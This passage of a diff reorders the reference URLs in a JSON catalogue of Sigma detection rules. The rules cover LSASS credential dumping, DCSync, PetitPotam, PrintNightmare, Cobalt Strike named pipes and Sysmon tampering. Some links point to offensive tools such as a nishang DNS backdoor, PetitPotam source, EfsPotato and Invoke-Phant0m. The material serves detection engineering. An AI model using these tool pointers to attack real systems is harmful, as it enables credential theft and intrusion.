"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://core.telegram.org/bots/faq", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -460,8 +460,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://twitter.com/stvemillertime/status/1024707932447854592", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ @@ -1330,9 +1330,9 @@ "logsource.product": "zeek", "refs": [ "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1441,8 +1441,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ @@ -1700,9 +1700,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], "tags": [ @@ -1777,8 +1777,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/OTRF/detection-hackathon-apt29", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" ], "tags": [ @@ -1843,12 +1843,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ @@ -1971,9 +1971,9 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://tools.ietf.org/html/rfc2929#section-2.1", "https://twitter.com/neu5ron/status/1346245602502443009", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], @@ -2148,10 +2148,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ - "http://edgeguides.rubyonrails.org/security.html", - "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", + "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "http://guides.rubyonrails.org/action_controller_overview.html", + "http://edgeguides.rubyonrails.org/security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2184,10 +2184,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ @@ -2211,10 +2211,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ @@ -2237,8 +2237,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" @@ -2299,8 +2299,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" @@ -2336,10 +2336,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ @@ -2387,8 +2387,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" @@ -2424,8 +2424,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2467,8 +2467,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" @@ -2504,12 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2532,10 +2532,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ @@ -2558,10 +2558,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", "https://github.com/zeronetworks/rpcfirewall", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2584,8 +2584,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" @@ -2610,10 +2610,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ @@ -2637,10 +2637,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ @@ -2663,8 +2663,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" @@ -2722,10 +2722,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], @@ -2907,8 +2907,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -2941,9 +2941,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ @@ -3189,9 +3189,9 @@ "logsource.product": "windows", "refs": [ "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], "tags": [ @@ -3225,9 +3225,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], @@ -3263,10 +3263,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], @@ -3301,10 +3301,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], @@ -3513,8 +3513,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" ], "tags": [ @@ -3548,9 +3548,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/codewhitesec/SysmonEnte/", - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" ], "tags": [ @@ -3583,8 +3583,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/boku7/spawn", "https://github.com/boku7/injectAmsiBypass", + "https://github.com/boku7/spawn", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" ], "tags": [ @@ -3619,9 +3619,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://twitter.com/SBousseaden/status/1541920424635912196", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], "tags": [ @@ -3735,8 +3735,8 @@ "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ @@ -3769,8 +3769,8 @@ "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ @@ -3803,8 +3803,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" ], "tags": [ @@ -3829,8 +3829,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" ], "tags": [ @@ -3912,10 +3912,10 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://github.com/SigmaHQ/sigma/issues/253", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://twitter.com/d4rksystem/status/1357010969264873472", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" ], @@ -3941,8 +3941,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "Internal Research", "https://attack.mitre.org/groups/G0010/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" ], "tags": [ @@ -4166,8 +4166,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://github.com/zcgonvh/EfsPotato", "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" ], "tags": [ @@ -4227,18 +4227,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", 